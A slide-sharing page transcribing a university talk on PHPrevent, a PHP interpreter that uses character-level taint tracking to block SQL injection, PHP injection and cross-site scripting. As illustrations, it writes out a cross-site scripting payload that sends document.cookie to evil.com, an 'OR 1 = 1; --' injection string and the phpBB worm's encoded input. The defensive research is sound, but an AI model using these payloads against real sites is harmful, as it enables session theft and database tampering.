Automatically Hardening Web Applications Using Precise Tainting

Slides:



Advertisements
Similar presentations
PHP Form and File Handling
Advertisements

PHP I.
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Gary Wassermann Zhendong Su.
Leveraging User Interactions for In-Depth Testing of Web Applications Sean McAllister, Engin Kirda, and Christopher Kruegel RAID ’08 1 Seoyeon Kang November.
1 RAKSHA: A FLEXIBLE ARCHITECTURE FOR SOFTWARE SECURITY Computer Systems Laboratory Stanford University Hari Kannan, Michael Dalton, Christos Kozyrakis.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
Chapter 6: Hostile Code Guide to Computer Network Security.
D ATABASE S ECURITY Proposed by Abdulrahman Aldekhelallah University of Scranton – CS521 Spring2015.
Preventing SQL Injection ~example of SQL injection $user = $_POST[‘user’]; $pass = $_POST[‘pass’]; $query = DELETE FROM Users WHERE user = ‘$user’ AND.
Java Security. Topics Intro to the Java Sandbox Language Level Security Run Time Security Evolution of Security Sandbox Models The Security Manager.
FALL 2005CSI 4118 – UNIVERSITY OF OTTAWA1 Part 4 Web technologies: HTTP, CGI, PHP,Java applets)
Prevent Cross-Site Scripting (XSS) attack
+ Websites Vulnerabilities. + Content Expand of The Internet Use of the Internet Examples Importance of the Internet How to find Security Vulnerabilities.
Analysis of SQL injection prevention using a proxy server By: David Rowe Supervisor: Barry Irwin.
SQL INJECTION COUNTERMEASURES &
CSCI 6962: Server-side Design and Programming Secure Web Programming.
Approaches to Application Security – DSM
Web Application Access to Databases. Logistics Test 2: May 1 st (24 hours) Extra office hours: Friday 2:30 – 4:00 pm Tuesday May 5 th – you can review.
Automatically Hardening Web Applications Using Precise Tainting Anh Nguyen-Tuong Salvatore Guarnieri Doug Greene Jeff Shirley David Evans University of.
AMNESIA: Analysis and Monitoring for NEutralizing SQL- Injection Attacks Published by Wiliam Halfond and Alessandro Orso Presented by El Shibani Omar CS691.
PHP TUTORIAL. HISTORY OF PHP  PHP as it's known today is actually the successor to a product named PHP/FI.  Created in 1994 by Rasmus Lerdorf, the very.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
A Data-Centric Web Application Security Framework Jonathan Burket, Patrick Mutchler, Michael Weaver, Muzzammil Zaveri, and David Evans University of Virginia.
Lecture 16 Page 1 CS 236 Online SQL Injection Attacks Many web servers have backing databases –Much of their information stored in a database Web pages.
Preventing Web Application Injections with Complementary Character Coding Raymond Mui Phyllis Frankl Polytechnic Institute of NYU Presented at ESORICS.
Attacking Applications: SQL Injection & Buffer Overflows.
Accessing MySQL with PHP IDIA 618 Fall 2014 Bridget M. Blodgett.
CSC-682 Cryptography & Computer Security Sound and Precise Analysis of Web Applications for Injection Vulnerabilities Pompi Rotaru Based on an article.
Security Scanners Mark Shtern. Popular attack targets Web – Web platform – Web application Windows OS Mac OS Linux OS Smartphone.
OWASP Top Ten #1 Unvalidated Input. Agenda What is the OWASP Top 10? Where can I find it? What is Unvalidated Input? What environments are effected? How.
Attacking Data Stores Brad Stancel CSCE 813 Presentation 11/12/2012.
Analysis of SQL injection prevention using a filtering proxy server By: David Rowe Supervisor: Barry Irwin.
Aniket Joshi Justin Thomas. Agenda Introduction to SQL Injection SQL Injection Attack SQL Injection Prevention Summary.
By Sean Rose and Erik Hazzard.  SQL Injection is a technique that exploits security weaknesses of the database layer of an application in order to gain.
If statements and validation. If statement In programming the if statement allows one to test certain conditions and respond differently depending on.
PwC New Technologies New Risks. PricewaterhouseCoopers Technology and Security Evolution Mainframe Technology –Single host –Limited Trusted users Security.
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Michael Dalton, Christos Kozyrakis, and Nickolai Zeldovich MIT, Stanford University USENIX 09’ Nemesis: Preventing Authentication & Access Control Vulnerabilities.
 Previous lessons have focused on client-side scripts  Programs embedded in the page’s HTML code  Can also execute scripts on the server  Server-side.
8 Chapter Eight Server-side Scripts. 8 Chapter Objectives Create dynamic Web pages that retrieve and display database data using Active Server Pages Process.
By Collin Donaldson. Hacking is only legal under the following circumstances: 1.You hack (penetration test) a device/network you own. 2.You gain explicit,
Database and Cloud Security
Application Communities
Javascript worms By Benjamin Mossé SecPro
Group 18: Chris Hood Brett Poche
Web Application Security
Web Application Vulnerabilities, Detection Mechanisms, and Defenses
Introduction to Dynamic Web Programming
Chapter 7: Identifying Advanced Attacks
WWW and HTTP King Fahd University of Petroleum & Minerals
SQL Injection.
Static Detection of Cross-Site Scripting Vulnerabilities
SE604: Software Testing and QA Secure SW Development for QA Lecture#3
SQL Injection Attacks Many web servers have backing databases
Security mechanisms and vulnerabilities in .NET
PHP / MySQL Introduction
Defense in Depth Web Server Custom HTTP Handler Input Validation
PHP: Security issues FdSc Module 109 Server side scripting and
Lecture 1: Multi-tier Architecture Overview
Lecture 2 - SQL Injection
IntroductionToPHP Static vs. Dynamic websites
CS5123 Software Validation and Quality Assurance
An Introduction to JavaScript
Exploring DOM-Based Cross Site Attacks
Web Application Development Using PHP
Veterans Health Administration
Presentation transcript:

Automatically Hardening Web Applications Using Precise Tainting Anh Nguyen-Tuong Salvatore Guarnieri Doug Greene Jeff Shirley David Evans University of Virginia

phpBB Worm December 21, 2004 Over 40,000 sites defaced PHP injection Loads Perl scripts to spread itself Uses Google to search for other phpBB sites

phpBB Vulnerability $words = explode (' ', trim (htmlspecialchars (urldecode ($HTTP_GET_VARS ['highlight'])))); ... $highlight_match[] = ... $words[$i] ...; … preg_replace (... $highlight_match ...) Original user input: '_%2527_attack User input after HTTP_GET_VARS call: \'_%27_attack User input after explicit urldecode call: \'_'_attack

Classes of Attacks Code injection Output generation Cause user provided data to be executed while data is being processed PHP injection (phpBB worm) SQL injection Output generation Cause user provided data to be displayed to visitors of the website: Cross Site Scripting

SQL Injection Attacker constructs data that injects database commands Example: $res = executeQuery ("SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ");

Cross Site Scripting Inserts user provided data onto a webpage that may include JavaScript Executes with permissions of hosting website Simple example: <b onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b>

Importance Over 12% of Secunia Advisories 4 of last 10 advisories from FrSIRT Cross Site Scripting and Code Injection are responsible for many attacks on the internet It is very hard to write bug free code

Previous Approaches Static techniques Dynamic techniques before deployment Dynamic techniques during deployment

Static Static analyzers [Shanker+ 01] Code inspections [Fagan76] SQL prepared statements [Fisk04, Php05] Pros No runtime overhead Can be done before website is released to the public Cons Coding practices may need to change Inspections are only as good as the inspector Many false positives

Dynamic Before Deployment Automated Test Suites: [Huang+ 04], [Tenable05], [Kavado05], [Offutt+ 04], [Watchfire05], [SPI05] Human testing Pros Coding practices do not need to change Attempts to simulate real world attacking conditions Cons Only tests known attacks, cannot show absence of vulnerability Requires developer effort to fix security holes

Automated Dynamic: Firewalls Incoming [Scott, Sharp 02] Incoming and Outgoing [Watchfire04], [Kavado05], [Teros04] Pros No need to modify web service Cons Only prevent recognized attacks Coarse policies without knowing application semantics

Automated: Magic Quotes Escape all quotes supplied by a user Implemented in PHP and other scripting languages Extremely successful Do not require the programmer to do anything Prevent many SQL injection attacks But, prevent only a specific class of attacks

Previous Work Limitations Being precise about what constitutes an attack is a lot of work Automated techniques suffer from not exploiting the application semantics We want a system that works as effortlessly as magic quotes, but prevents a wider class of attacks

Our Approach Fully automated Aware of application semantics Replace PHP interpreter with a modified interpreter that: Keeps track of which information comes from untrusted sources (precise tainting) Checks how untrusted input is used

PHPrevent Client PHP Interpreter file.php File System Database 2 3 File System 1 PHP Interpreter PHPrevent 4 Client 8 Database 5 HTTP Server 7 6 System APIs Web Server

Coarse Grain Tainting Provided by many scripting languages (Perl, Ruby) Untrusted input is tainted Everything touched by tainted data becomes tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' "; Entire $query string is tainted

Precise Tainting Untrusted input is tainted Taint markings are maintained at character level Depends on semantics of program Only really tainted data is tainted $query = "SELECT real_name FROM users WHERE user = '" . $user . "'AND pwd = '" . $pwd . "' ";  user = '' OR 1 = 1; -- ';'AND pwd = '' ";

Precise Checking Wrappers around PHP functions that handle updating and checking precise taint information Conservative: no false negatives while minimizing false positives Behavior only changes when an attack is likely

Preventing SQL Injection Parse the query using the Postgres SQL parser: identify interpreted text Disallow SQL keywords or delimiters in interpreted text that is tainted Query is not sent to database Error response it returned "SELECT real_name FROM users WHERE user = '' OR 1 = 1; -- ';' AND pwd = '' ";

Preventing PHP Injection Disallow tainted data to be used in functions that treat input strings as PHP code or manipulate system state We place wrappers around these functions to enforce this rule phpBB attack prevented by wrappers around preg_replace

Preventing Cross Site Scripting Wrappers around output functions Buffer output and then parse the tainted output with HTML Tidy Check the parsed HTML against a white list to ensure there is no dangerous output Dangerous content was determined by examining HTML grammar Sanitize it by removing tags <b>Hello</b>  Safe <b onmouseover= 'location.href= "http://evil.com/steal.php?" + document.cookie'>Hello</b>  Unsafe

Current Status Modified PHP interpreter: PHPrevent Performance Prevents PHP injection, SQL injection and cross site scripting attacks Overly conservative: we have not specified precise semantics for most PHP functions Performance Initial measurements indicate performance overhead is acceptable

Future Work: Theory and Analysis End-to-end information flow security Replace ad-hoc taint marking with principled mechanism Analyze data flow at interpreter level Infer taint specifications for PHP functions using dynamic analysis Verify that taint marking in PHP specification is consistent with interpreter implementation

Future Work: Implementation Full implementation of precise tainting for PHP APIs Handle persistent state Track tainting through database store Multiple tainting types with different checking rules Incorporate modifications into main PHP distribution

Summary Many websites are prone to attacks even after using current methods Our method: Fully automated Prevents large classes of attacks Easy to deploy

Thank You www.cs.virginia.edu/sammyg

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.